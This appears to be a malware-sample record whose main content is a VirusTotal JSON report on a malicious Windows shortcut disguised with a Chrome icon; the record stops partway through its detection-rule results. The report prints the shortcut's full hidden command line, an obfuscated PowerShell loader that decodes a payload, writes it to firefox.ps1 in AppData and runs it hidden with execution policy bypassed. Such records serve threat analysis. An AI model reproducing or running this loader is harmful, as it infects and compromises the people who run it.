5577fffb5b5acd3771ef9dc696498f1e

Hash

  • MD5: 5577fffb5b5acd3771ef9dc696498f1e
  • SHA1: 96f7e28184e2e08fae0b76175d813346f9e24db3
  • SHA256: 863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1
  • First Seen: 2026-04-03
  • Last Seen: 2026-04-03

Additional Information

VirusTotal
                {
    "data": {
        "id": "863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1",
        "type": "file",
        "links": {
            "self": "https://www.virustotal.com/api/v3/files/863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1"
        },
        "attributes": {
            "sigma_analysis_stats": {
                "critical": 0,
                "high": 4,
                "medium": 3,
                "low": 3
            },
            "magic": "MS Windows shortcut, Has Description string, Has command line arguments, Icon number=0, ctime=Thu Dec 31 23:59:59 1969, mtime=Thu Dec 31 23:59:59 1969, atime=Thu Dec 31 23:59:59 1969, length=0, window=hidenormalshowminimized",
            "times_submitted": 3,
            "last_modification_date": 1776247118,
            "size": 988116,
            "tags": [
                "large-file",
                "long-command-line-arguments",
                "lnk",
                "abused-exe-pattern",
                "executes-dropped-file",
                "detect-debug-environment",
                "hiding-window"
            ],
            "last_analysis_stats": {
                "malicious": 32,
                "suspicious": 0,
                "undetected": 28,
                "harmless": 0,
                "timeout": 0,
                "confirmed-timeout": 0,
                "failure": 3,
                "type-unsupported": 13
            },
            "md5": "5577fffb5b5acd3771ef9dc696498f1e",
            "magika": "LNK",
            "sha1": "96f7e28184e2e08fae0b76175d813346f9e24db3",
            "sha256": "863f1405a190e2d87f06c5a9383b91b660bf4a0cd1b7c1c4987a071ee1c7dbb1",
            "type_tag": "lnk",
            "first_submission_date": 1774511404,
            "reputation": 0,
            "lnk_info": {
                "modification_date": "1970-01-01T00:00:00Z",
                "link_flags": [
                    "HasName",
                    "IsUnicode",
                    "HasExprString",
                    "HasArguments",
                    "PreferEnvironmentPath",
                    "HasIconLocation"
                ],
                "command_line_arguments": "                                                                                                                                                                                                                                                                                                                         \"$VIUSBvejbawf = \\\"165 83 24 20 105 152 134 90 99 35 96 125 116 92 97 172 105 50 122 92 93 85 103 36 95 132 134 162 121 107 29 37 112 155 150 130 103 29 57 104 104 96 121 107 29 37 165 172 167 169 170 236 157 25 236 74 61 236 151 176 173 236 50 57 234 184 176 236 79 68 234 28 156 236 73 57 162 89 104 43 107 146 177 105 85 88 29 25 173 152 176 167 100 29 25 171 170 174 89 89 87 94 171 170 174 154 101 40 107 162 179 92 93 170 102 107 108 115 162 102 170 102 107 94 104 174 142 168 48 25 98 106 101 169 143 113 107 102 105 96 104 88 100 68 99 110 99 80 122 76 42 138 115 120 83 135 93 34 131 125 111 133 135 44 54 128 159 131 120 92 27 62 99 144 133 101 120 33 26 126 145 119 149 126 80 85 159 165 159 155 155 90 92 151 116 105 86 82 93 107 146 181 172 89 90 34 35 104 114 92 128 104 113 80 173 179 111 87 97 40 33 104 99 163 98 90 34 24 93 166 111 85 170 86 105 107 99 111 91 105 41 63 108 104 107 169 143 113 107 96 116 103 91 170 86 109 169 111 103 93 103 65 44 89 109 176 140 172 111 41 94 114 88 155 92 45 39 171 154 172 101 85 37 33 97 105 176 140 172 111 105 102 97 92 85 88 98 44 93 108 161 83 152 98 29 91 102 102 100 105 29 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 93 99 97 95 103 46 25 132 113 167 160 157 31 40 93 102 93 96 88 34 27 84 166 106 96 96 44 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 103 108 100 100 124 48 25 101 172 167 154 90 48 22 142 99 107 99 143 109 43 91 116 98 102 100 67 44 96 112 174 142 172 109 44 102 112 98 85 143 105 107 128 102 86 96 96 37 44 158 160 162 153 170 101 107 165 126 
103 91 104 34 22 90 179 164 167 172 67 57 173 164 160 155 156 86 109 118 108 98 167 160 111 87 153 154 176 81 150 93 100 171 169 174 136 92 33 33 104 126 107 167 160 111 43 130 108 92 154 151 94 86 159 162 154 167 160 111 101 130 141 124 124 128 101 33 100 106 107 169 133 44 42 98 102 167 167 160 111 74 101 99 174 157 170 34 32 104 179 164 167 157 96 89 152 179 164 167 156 99 93 171 169 174 155 156 99 93 171 169 174 118 107 43 44 91 108 161 148 153 90 95 154 159 174 160 172 100 35 94 108 98 169 170 113 107 146 181 172 97 103 48 41 104 99 93 169 143 113 77 82 179 128 119 131 59 76 121 144 163 117 125 70 72 127 179 176 140 172 109 44 89 106 101 94 79 86 109 132 103 90 90 97 44 96 123 112 93 85 127 44 25 101 102 108 169 159 60 27 100 181 172 101 85 37 33 97 105 176 156 132 44 44 105 112 94 86 172 109 37 104 116 108 100 90 30 109 160 128 93 100 90 80 38 104 103 92 169 168 48 38 104 103 92 169 159 66 24 89 143 103 93 103 113 105 84 92 87 101 172 100 56 90 112 142 104 89 40 42 125 116 94 86 99 35 38 146 175 172 80 83 24 41 146 181 176 165 89 30 26 173 152 176 127 93 40 31 160 133 111 85 100 113 101 169 112 98 83 146 80 29 93 145 111 85 107 104 109 171 166 131 96 105 31 30 90 102 106 85 157 58 36 95 113 97 82 89 98 57 104 104 96 93 107 29 40 90 166 119 104 100 34 30 159 107 93 100 170 86 109 169 102 97 90 172 84 109 131 102 103 91 159 65 44 89 109 176 161 168 44 31 87 155 143 89 92 77 44 89 116 167 169 170 98 64 100 114 94 90 89 34 39 89 166 121 96 94 45 30 86 98 161 117 103 36 29 97 116 92 100 89 98 52 108 109 97 90 158 31 25 103 179 149 169 168 23 30 94 112 176 140 172 111 52 108 109 97 90 158 31 25 103 179 149 165 103 31 43 130 138 135 169 143 113 107 169 110 92 85 88 29 94 108 101 103 154 86 93 94 93 99 97 95 103 46 25 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 107 133 107 29 44 122 97 94 96 94 42 101 169 101 94 90 98 44 42 89 140 108 160 163 98 27 104 101 97 86 99 29 30 91 92 161 99 99 37 40 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 
107 133 107 29 44 122 97 94 96 94 42 101 169 91 97 90 103 104 100 158 99 111 82 141 31 40 103 152 172 103 90 48 31 106 109 130 104 95 44 107 146 181 135 91 86 34 34 104 168 121 100 106 63 40 92 96 107 86 88 113 96 120 99 103 169 168 44 27 107 138 133 128 172 100 69 104 116 108 100 90 30 109 169 109 107 104 104 44 27 90 181 163 116 89 44 27 140 110 107 91 88 113 105 108 110 107 91 88 113 96 126 96 92 131 99 37 40 173 177 97 90 93 113 96 120 98 107 135 107 30 36 106 133 111 87 89 40 31 102 154 176 87 103 35 44 96 112 163 96 88 44 32 173 168 96 104 88 41 109 169 102 97 90 172 100 31 104 94 98 104 95 44 109 169 98 93 86 145 113 109 169 101 96 89 172 84 109 131 102 103 91 159 65 44 89 109 176 161 168 44 31 87 155 143 89 92 77 44 89 116 167 169 170 98 64 100 114 94 90 89 34 39 89 166 121 96 94 45 30 86 98 161 134 96 34 24 105 130 92 90 90 44 94 103 116 109 100 106 34 30 98 167 96 86 155 111 82 173 177 93 85 90 113 80 173 174 172 104 96 40 26 144 149 168 167 95 34 27 84 130 92 167 160 111 85 148 157 174 157 170 77 40 91 108 90 100 170 104 82 169 104 93 140 159 39 30 100 103 176 161 170 68 40 171 169 172 104 96 40 26 114 165 115 157 170 31 40 108 104 174 160 145 109 27 103 152 163 95 93 40 31 165 179 126 99 105 95 107 161 177 111 93 99 30 50 156 120 164 165 107 37 36 90 122 158 108 160 111 75 84 97 107 86 170 104 82 169 98 92 87 143 81 101 169 104 93 157 170 31 20 93 97 97 167 160 109 27 103 169 176 167 103 30 64 108 103 111 98 170 101 109 171 99 107 104 170 104 82 169 99 107 89 143 81 101 171 104 93 81 170 101 107 91 93 174 157 170 63 71 137 147 174 157 170 36 44 95 110 174 157 172 111 39 103 179 167 142 168 45 40 103 181 147 169 170 28 26 100 103 105 169 121 24 26 89 112 99 142 87 30 36 95 110 176 118 83 30 25 104 104 162 128 125 86 24 90 108 98 98 172 62 20 90 97 107 92 158 62 40 106 96 94 96 88 24 95 138 99 88 98 90 48 29 101 92 149 89 87 47 33 100 114 176 102 96 48 26 90 181 135 91 99 29 18 93 96 110 93 99 46 109 90 97 111 85 99 46 109 139 92 92 100 113 52 109 137 112 
109 161 138 24 25 104 122 115 169 99 35 75 84 97 107 86 160 30 25 91 108 98 98 172 33 22 105 172 85 92 89 25 109 100 104 147 91 103 26 109 96 98 88 161 99 35 75 84 97 107 86 163 86 75 84 97 107 110 111 113 26 144 103 107 82 172 79 20 89 112 117 150 154 52 82 100 103 92 169 96 44 31 144 108 99 155 122 44 44 105 173 93 157 156 101 26 159 137 107 91 101 29 37 164 154 103 99 164 37 40 95 180 147 86 158 69 40 95 110 92 97 163 22 27 104 97 91 87 94 113 31 88 105 100 142 79 79 20 89 112 117 108 172 46 43 129 112 98 140 94 44 22 173 147 87 85 103 54 89 112 154 103 92 158 63 40 108 113 168 102 106 69 40 95 169 160 157 152 104 82 123 143 140 135 172 33 43 98 152 98 100 85 113 59 135 145 142 161 92 26 41 161 98 167 142 138 24 25 104 122 115 169 97 44 20 144 101 110 94 158 74 40 89 147 87 85 103 30 101 154 163 167 142 138 24 25 104 122 115 169 99 27 80 93 115 101 155 133 44 25 139 92 92 100 89 105 92 151 172 149 136 95 48 31 102 112 108 169 95 48 80 95 112 89 169 139 36 44 95 110 107 101 164 104 82 132 146 94 81 120 31 44 95 98 106 90 90 36 109 137 112 109 140 95 48 95 138 111 106 85 103 77 40 106 99 88 87 164 38 40 84 169 103 83 163 86 74 91 93 125 85 102 43 32 173 114 93 140 94 44 22 173 146 94 81 121 29 39 103 104 168 96 95 101 73 104 114 164 153 163 86 32 90 93 176 90 95 84 31 104 94 176 92 89 25 101 164 154 109 86 158 78 30 93 92 124 90 164 34 32 164 154 97 92 158 77 36 90 101 97 86 103 105 100 146 99 107 85 87 31 31 173 102 99 155 120 34 76 91 99 111 80 164 104 82 80 88 174 142 168 40 80 157 154 172 104 143 109 36 162 177 111 87 101 30 50 156 120 149 165 92 84 107 101 102 97 89 170 86 105 90 152 144 161 170 87 107 161 179 93 143 170 104 82 169 99 147 165 92 113 96 91 112 96 93 107 46 40 173 179 97 167 160 111 25 171 154 106 90 90 44 44 106 109 168 165 99 29 40 96 181 103 91 172 109 27 104 101 167 78 168 45 40 103 152 172 101 103 43 109 160 99 107 89 96 48 42 104 181 172 96 88 44 32 161 177 93 85 90 54 105 100 120 149 165 99 102 98 146 88 143 101 104 100 57 84 101 107 169 
159 61 20 93 112 140 100 102 40 31 100 97 103 90 94 113 105 105 112 106 142 168 33 22 105 181 147 169 170 70 36 129 137 128 146 89 30 106 171 154 172 100 103 44 109 144 181 134 90 99 35 96 125 116 92 97 172 105 105 104 103 90 143 139 33 29 137 116 92 104 163 113 107 95 112 89 86 158 33 26 156 179 149 165 101 29 25 89 97 176 140 172 111 37 89 97 96 86 146 98 94 102 108 92 93 107 47 95 106 102 99 167 145 109 44 89 106 101 94 172 84 109 171 110 100 89 107 29 96 132 107 105 92 83 63 72 106 146 110 113 86 76 89 98 139 120 104 136 76 40 118 136 154 124 123 33 23 126 107 139 126 104 61 29 90 134 140 112 152 67 76 149 167 160 152 158 96 86 156 159 111 98 89 23 89 171 154 172 89 90 34 35 104 114 92 128 104 113 80 173 179 111 87 97 40 33 104 99 163 98 90 34 24 93 166 111 85 170 86 105 107 99 111 91 105 41 63 108 104 107 169 143 113 107 96 116 103 91 170 86 105 103 108 100 100 124 48 25 101 181 147 169 170 30 42 108 105 100 155 88 25 25 171 154 172 101 85 37 33 97 105 176 140 172 111 105 102 97 92 85 88 98 44 93 108 161 83 152 98 29 91 102 102 100 105 29 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 93 99 97 95 103 46 25 132 113 167 160 157 31 40 93 102 93 96 88 34 27 84 166 106 96 96 44 26 158 177 168 110 87 31 36 112 155 150 132 89 46 44 93 112 140 104 88 48 58 89 99 103 91 101 105 105 103 108 100 100 124 48 25 101 172 167 154 90 48 22 142 99 107 99 143 109 43 91 116 98 102 100 67 44 96 112 174 142 168 48 38 104 103 92 140 164 111 64 94 91 103 93 96 48 94 152 167 160 167 160 111 101 118 108 98 101 93 26 26 171 169 174 169 126 61 109 156 165 162 153 145 113 54 100 103 174 157 170 91 89 146 181 88 147 152 104 107 161 179 143 89 92 37 40 118 112 174 157 170 47 66 100 97 161 148 153 90 95 154 159 174 157 170 105 66 133 129 131 125 160 37 36 98 112 176 130 103 46 34 94 172 174 157 170 78 37 91 179 164 167 93 36 40 171 169 174 154 155 93 88 171 169 174 153 158 97 107 161 179 162 153 158 97 107 161 179 125 104 102 48 27 100 
166 155 150 149 99 90 151 179 167 169 159 39 30 100 103 176 167 172 111 82 169 109 107 104 104 44 27 90 181 147 169 140 22 107 125 131 135 115 139 61 72 160 129 129 126 135 67 107 173 152 176 165 107 29 34 98 106 83 142 168 31 40 90 101 97 91 89 44 109 144 181 135 91 86 34 34 104 168 121 100 106 63 40 92 96 107 86 88 113 96 120 99 103 169 168 45 22 97 105 100 93 172 100 69 104 116 108 100 90 30 109 169 109 107 104 104 44 27 90 181 163 116 89 44 27 140 110 107 91 88 113 105 108 110 107 91 88 113 96 120 98 107 135 107 30 36 106 133 111 87 89 40 31 102 154 117 135 83 29 40 114 120 115 165 106 24 25 104 98 176 140 172 109 27 104 98 96 90 94 30 40 159 146 97 91 88 44 31 89 154 117 135 83 29 40 114 120 115 165 104 44 42 107 92 92 100 89 84 50 132 103 103 85 111 87 83 137 112 109 161 168 47 20 89 112 93 157 168 33 22 105 172 149 110 121 24 26 89 112 99 155 120 44 21 89 167 139 91 105 34 41 100 103 105 108 146 87 76 122 146 135 128 158 74 40 89 130 92 87 99 35 38 165 177 108 100 105 47 20 89 112 93 160 80 113 62 88 97 163 131 99 37 40 173 168 138 96 96 44 61 108 97 104 169 168 44 40 104 181 163 132 94 46 30 105 108 98 98 172 28 25 103 157 149 118 88 48 27 89 168 128 87 93 46 40 90 98 176 89 93 26 40 91 98 104 100 96 37 109 160 148 94 98 87 36 40 95 97 132 96 89 29 109 171 168 130 90 124 31 30 103 108 100 100 172 100 72 85 112 109 84 88 40 30 95 133 97 93 99 46 20 173 147 87 89 107 30 26 173 168 138 96 96 44 109 169 112 107 100 170 113 96 118 108 98 101 93 26 58 89 92 100 100 172 73 36 105 113 107 91 145 106 82 173 177 93 85 90 113 17 173 134 91 85 159 75 36 97 112 176 156 134 40 33 104 133 111 85 100 113 105 93 101 96 169 159 76 31 106 102 108 96 94 42 109 120 129 138 145 145 113 105 108 114 92 96 93 35 109 144 181 130 100 85 100 58 106 109 107 101 87 37 40 105 129 111 86 97 80 42 89 108 97 91 172 100 72 85 112 109 84 88 44 109 171 94 93 102 90 40 29 89 167 107 81 103 111 109 160 148 94 98 87 36 40 95 97 176 167 157 98 43 173 166 161 91 93 37 30 102 102 176 105 170 109 26 
90 98 112 167 170 86 109 169 97 94 96 101 42 40 91 181 147 169 126 44 22 160 130 109 97 103 45 24 97 112 108 117 107 30 34 121 99 103 98 101 44 27 173 168 129 91 105 44 109 160 148 92 169 164 74 40 89 168 140 104 88 44 100 159 148 108 101 127 40 31 88 97 107 86 164 96 93 164 181 163 119 103 33 40 89 108 92 96 93 35 68 95 97 107 87 86 48 33 173 173 130 100 85 100 57 100 104 107 118 92 48 31 173 168 131 96 94 28 25 104 98 176 150 151 104 82 173 177 93 100 88 29 36 95 110 93 169 143 113 63 104 94 163 118 105 41 40 105 96 100 100 104 61 44 90 106 125 100 88 29 36 95 110 93 118 103 29 109 160 141 103 101 104 44 31 146 181 126 100 101 40 26 89 112 94 156 121 46 37 104 113 91 93 103 45 57 108 98 101 169 159 61 44 90 106 130 104 95 44 109 171 136 103 102 90 34 26 94 111 92 132 104 42 40 120 101 108 104 88 44 57 108 98 101 124 107 46 37 100 103 107 130 133 30 22 91 90 138 147 156 95 84 154 159 157 151 159 94 88 123 168 156 136 154 75 96 148 159 143 145 159 97 90 138 162 139 134 136 91 84 154 111 155 76 170 113 96 140 114 92 96 93 35 109 169 116 109 85 99 34 31 173 168 124 87 99 42 38 104 99 176 165 88 31 36 102 110 107 87 172 100 58 104 97 92 96 94 42 26 173 177 93 100 88 29 36 95 110 93 142 172 109 40 104 112 176 140 172 71 30 100 103 163 121 107 29 37 173 173 172 100 94 27 83 140 101 96 133 107 29 44 164 181 174 91 103 26 26 159 101 93 152 170 86 109 173 177 111 93 99 30 80 141 173 174 92 93 31 20 122 97 174 157 170 89 84 149 179 164 167 136 44 27 100 95 107 167 163 86 105 96 98 147 156 98 34 36 95 181 168 167 127 44 107 161 177 111 93 99 30 50 157 120 164 167 90 44 44 96 179 167 142 168 31 39 144 168 102 90 99 35 101 171 131 106 102 154 111 97 169 116 100 96 89 54 92 112 169 172 104 96 40 26 114 163 115 157 170 79 20 89 112 93 167 163 86 105 90 97 94 140 140 105 105 96 98 164 167 90 24 29 89 102 174 157 168 31 39 161 181 174 100 89 68 44 95 116 105 167 160 113 107 91 112 111 167 163 86 105 91 112 96 140 140 105 107 96 98 88 167 160 111 27 85 179 164 167 122 75 73 139 179 
164 167 95 48 31 102 179 164 169 170 43 39 171 172 149 165 104 44 39 173 152 176 167 87 30 36 95 110 176 118 83 30 25 104 104 149 84 89 40 31 102 181 125 80 89 29 40 96 167 135 122 145 28 26 100 103 105 169 121 24 26 89 112 99 155 121 44 42 88 99 103 85 83 99 74 91 93 105 87 107 33 37 84 154 96 84 106 37 36 106 181 109 93 107 30 26 173 140 98 96 88 22 29 88 115 100 96 105 113 26 89 116 92 96 105 113 75 84 97 107 110 111 113 73 104 114 168 135 83 29 40 114 120 176 96 94 79 20 89 112 93 157 89 29 27 100 103 105 169 92 26 41 164 90 99 86 84 113 36 96 152 98 100 85 113 32 90 93 168 96 94 79 20 89 112 93 160 145 79 20 89 112 117 108 172 30 80 95 112 89 169 138 24 25 104 122 157 151 111 86 36 95 97 176 93 103 35 80 100 104 162 119 103 48 41 165 98 164 153 160 30 95 129 112 98 98 88 41 100 146 108 106 161 96 44 31 172 152 93 155 128 44 31 102 97 104 160 81 31 40 89 96 94 91 172 35 24 97 105 149 76 138 24 25 104 122 115 169 105 47 65 104 103 147 91 103 26 109 139 92 92 100 113 93 48 146 108 99 155 122 44 44 105 173 109 103 128 44 31 161 165 164 149 163 86 59 135 145 142 169 92 47 34 144 103 107 82 172 63 71 137 147 168 89 85 45 97 90 172 149 135 83 29 40 114 120 176 94 103 24 80 93 115 101 155 133 44 25 139 92 92 100 89 105 90 155 172 149 135 83 29 40 114 120 176 96 86 84 29 107 106 162 130 103 29 75 84 97 107 86 164 96 87 164 154 143 92 107 35 38 104 113 176 92 107 84 31 104 94 176 136 95 48 31 102 112 108 161 163 86 68 138 99 88 117 90 48 31 90 111 97 87 95 113 73 104 114 147 92 107 99 74 103 111 92 100 136 44 42 91 93 94 161 97 44 20 161 108 90 160 145 78 27 85 130 92 99 102 36 109 106 98 147 91 103 26 109 138 99 88 118 88 43 39 96 173 103 92 160 77 40 106 169 160 160 145 36 26 85 181 97 92 143 35 40 86 181 99 86 84 105 100 146 114 93 155 137 34 29 84 129 97 161 93 36 100 146 102 99 155 136 40 26 93 102 93 100 164 104 82 91 112 92 84 90 35 109 94 104 162 117 93 80 27 91 116 87 161 163 86 16 80 179 149 165 99 84 93 146 177 111 140 168 40 98 169 116 94 98 89 54 92 112 154 
172 89 143 111 37 94 102 96 167 145 109 26 144 149 168 167 146 111 97 171 98 150 167 163 86 105 91 152 172 89 172 100 27 104 101 100 104 105 44 109 171 102 174 157 170 29 107 146 111 97 87 103 48 42 101 173 172 96 88 44 32 173 108 98 169 168 31 40 93 172 85 165 104 44 39 144 177 108 100 102 113 96 91 112 96 93 107 46 40 173 177 103 85 103 36 97 169 98 92 87 113 109 36 112 154 172 96 161 102 82 80 148 108 101 159 61 20 93 112 176 156 120 24 29 104 145 107 99 99 35 36 89 108 97 91 172 109 41 104 111 149 165 92 26 41 173 152 176 167 129 40 65 129 133 153 86 89 110 107 146 177 106 89 92 33 109 144 181 174 104 98 34 43 106 116 100 93 158 29 21 89 179 149 165 104 26 33 97 105 100 152 172 84 109 171 177 105 85 88 29 25 158 116 96 96 157 27 89 158 101 94 90 98 44 42 89 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 96 87 93 39 40 106 97 135 101 163 104 94 91 112 96 90 89 40 25 94 99 87 154 102 40 33 104 98 161 165 164 54 24 91 108 115 143 146 76 26 106 116 96 100 136 48 25 108 130 92 87 99 35 38 165 177 106 89 92 33 100 164 166 94 104 85 82 27 104 111 147 165 106 31 44 95 114 104 123 107 36 40 171 154 172 87 103 30 29 94 103 93 100 172 84 109 132 103 90 90 97 44 96 118 112 110 119 103 32 24 104 98 92 169 159 60 27 100 181 172 101 85 37 33 97 105 159 169 159 73 40 108 113 107 87 89 113 105 101 112 111 101 103 31 26 173 168 123 86 103 31 76 102 112 98 85 172 109 44 102 112 98 85 172 100 56 90 112 142 104 89 40 42 125 116 94 86 99 35 38 146 122 142 80 88 44 50 112 120 172 103 83 29 40 90 181 147 169 168 31 40 90 101 97 91 89 44 95 138 102 98 85 103 35 25 146 122 142 80 88 44 50 112 120 172 101 103 46 43 84 97 107 86 143 54 68 95 108 92 108 146 87 73 104 114 168 165 106 24 25 104 98 164 165 92 26 41 164 154 117 118 83 30 25 104 104 162 117 103 25 25 159 144 98 102 93 45 36 95 110 115 143 146 80 58 138 140 135 155 133 44 25 122 97 94 96 94 42 101 169 113 107 102 106 24 25 104 98 167 77 172 66 24 89 168 138 96 96 44 109 160 
143 103 93 103 65 44 89 109 176 165 103 44 40 173 168 139 91 105 34 41 100 103 105 169 87 29 39 149 154 125 85 107 31 25 160 133 94 90 105 44 26 90 181 96 90 85 44 27 90 109 107 93 96 113 96 140 99 105 84 95 44 31 89 137 103 86 88 113 107 160 135 97 121 90 34 39 100 105 107 169 159 76 21 104 114 91 85 99 34 31 125 102 100 96 105 24 109 139 92 96 104 89 30 109 160 143 103 93 103 113 105 104 112 107 167 172 100 54 100 103 108 90 85 62 25 84 105 107 169 132 40 41 105 112 98 142 172 113 109 169 111 96 89 92 113 80 173 179 111 95 93 47 42 108 105 100 155 88 25 25 171 154 172 101 85 37 33 97 105 159 169 143 113 107 169 110 92 85 88 29 94 108 101 103 154 86 93 94 93 99 97 95 103 46 25 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 107 133 107 29 44 122 97 94 96 94 42 101 169 101 94 90 98 44 42 89 140 108 160 163 98 27 104 101 97 86 99 29 30 91 92 161 99 99 37 40 90 166 172 161 113 28 27 100 120 150 143 135 30 42 108 101 107 133 107 29 44 122 97 94 96 94 42 101 169 111 96 89 92 104 100 158 99 111 82 141 31 40 103 152 172 103 90 48 31 106 109 130 104 95 44 107 146 181 135 91 86 34 34 104 168 121 100 106 63 40 92 96 107 86 88 113 96 120 99 103 169 168 45 22 97 105 100 93 155 113 96 133 112 111 101 103 31 26 173 177 104 100 107 45 40 91 98 176 156 119 30 40 91 148 105 100 94 29 109 169 116 105 100 94 29 109 160 134 91 85 134 40 33 104 181 172 100 103 44 109 160 128 93 100 138 48 26 100 114 128 104 90 30 36 95 110 149 118 88 48 27 89 168 128 87 93 46 40 90 98 176 89 93 26 40 91 98 104 100 96 37 109 160 148 94 98 87 36 40 95 97 132 96 89 29 109 171 168 130 90 124 31 30 103 108 100 100 172 100 72 85 112 109 84 88 40 30 95 133 97 93 99 46 20 173 147 87 89 107 30 26 173 168 138 96 96 44 109 169 112 107 100 170 113 96 118 108 98 101 93 26 58 89 92 100 100 172 73 36 105 113 107 91 145 113 109 123 112 99 90 86 44 96 132 97 107 92 172 100 61 108 97 104 169 168 68 20 132 103 90 90 105 48 25 100 102 98 155 127 24 74 94 104 99 104 94 45 95 125 116 92 97 172 100 71 94 99 109 
100 145\\\";$Length = $VIUSBvejbawf.Length;$CLOIJSfgiojvosef235sdb = New-Object System.Collections.ArrayList;[string] $date = $null;$m = 0;for($k = 0; $k -lt $Length; $k++){$date += $VIUSBvejbawf[$k];if($VIUSBvejbawf[$k] -eq \\\" \\\"){[void]$CLOIJSfgiojvosef235sdb.Add([byte] $date);$m++;$date = $null;continue;}}$Apkengsidefg =  \\\"be*&fni\\\";[Byte[]]$pw = [System.Text.Encoding]::UTF8.GetBytes(\\\"$Apkengsidefg\\\");\r\n$pw_Length = $Apkengsidefg.Length;$MFibvfaibfeg2345fbdfg = New-Object System.Byte[]($CLOIJSfgiojvosef235sdb.Count);$j = 0;for($i = 0; $i -lt $CLOIJSfgiojvosef235sdb.Count; $i++){$pw_num = $pw[$j] + 103;if($pw_num -ge $CLOIJSfgiojvosef235sdb[$i]){$MFibvfaibfeg2345fbdfg[$i] =  $pw_num - $CLOIJSfgiojvosef235sdb[$i];}else{$MFibvfaibfeg2345fbdfg[$i] = $CLOIJSfgiojvosef235sdb[$i];}$j++;if($j -eq $pw_Length){$j = 0;}}$qqpvm = [System.Text.Encoding]::UTF8.GetString($MFibvfaibfeg2345fbdfg);$fgfw98JHGVfeg = \\\"$env:appdata\\firefox.ps1\\\";$qqpvm|Out-File -FilePath $fgfw98JHGVfeg;powershell -windowstyle hidden -ExecutionPolicy Bypass $fgfw98JHGVfeg;\"\r\n",
                "icon_location": "%ProgramFiles%\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe",
                "creation_date": "1970-01-01T00:00:00Z",
                "header": {
                    "show_window": 7,
                    "file_size": 0,
                    "hot_key": "(0+0)",
                    "show_window_str": "SW_SHOWMINNOACTIVE"
                },
                "access_date": "1970-01-01T00:00:00Z"
            },
            "sigma_analysis_results": [
                {
                    "rule_level": "high",
                    "rule_id": "76e8bb8877ab40bd84b14fc93daffe9ff7ebe9440ce09916b5c63a302d62c918",
                    "rule_source": "Joe Security Rule Set (GitHub)",
                    "rule_title": "Dot net compiler compiles file from suspicious location",
                    "rule_description": "Dot net compiler compiles file from suspicious location",
                    "rule_author": "Joe Security",
                    "match_context": [
                        {
                            "values": {
                                "Product": "Microsoft\\xae .NET Framework",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "csc.exe",
                                "Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
                                "Description": "Visual C# Command Line Compiler",
                                "FileVersion": "4.8.4084.0 built by: NET48REL1",
                                "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline\"",
                                "EventID": "1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
                                "Company": "Microsoft Corporation"
                            }
                        },
                        {
                            "values": {
                                "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe /noconfig /fullpaths @C:\\Users\\<USER>\\AppData\\Local\\Temp\\i3ogpj35\\i3ogpj35.cmdline",
                                "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
                                "EventID": "1"
                            }
                        }
                    ]
                },
                {
                    "rule_level": "high",
                    "rule_id": "b0e07fc365ce0d0690c84a20e3467a5be2301d1c4de1e87bcbb9cb9ea841222c",
                    "rule_source": "Sigma Integrated Rule Set (GitHub)",
                    "rule_title": "Csc.EXE Execution Form Potentially Suspicious Parent",
                    "rule_description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.",
                    "rule_author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)",
                    "match_context": [
                        {
                            "values": {
                                "Hashes": "MD5=F65B029562077B648A6A5F6A1AA76A66,SHA256=4A6D0864E19C0368A47217C129B075DDDF61A6A262388F9D21045D82F3423ED7,IMPHASH=EE1E569AD02AA1F7AECA80AC0601D80D",
                                "CurrentDirectory": "C:\\Users\\Bruno\\Desktop\\",
                                "OriginalFileName": "csc.exe",
                                "Product": "Microsoft\\xae .NET Framework",
                                "Description": "Visual C# Command Line Compiler",
                                "EventID": "1",
                                "ParentCommandLine": "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -windowstyle hidden -ExecutionPolicy Bypass C:\\Users\\Bruno\\AppData\\Roaming\\firefox.ps1",
                                "CommandLine": "\"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\" /noconfig /fullpaths @\"C:\\Users\\Bruno\\AppData\\Local\\Temp\\flwg3nkw\\flwg3nkw.cmdline\"",
                                "FileVersion": "4.8.4084.0 built by: NET48REL1",
                                "ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
                                "IntegrityLevel": "High",
                                "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
                                "Company": "Microsoft Corporation"
                            }
                        }
                    ]
                },
                {
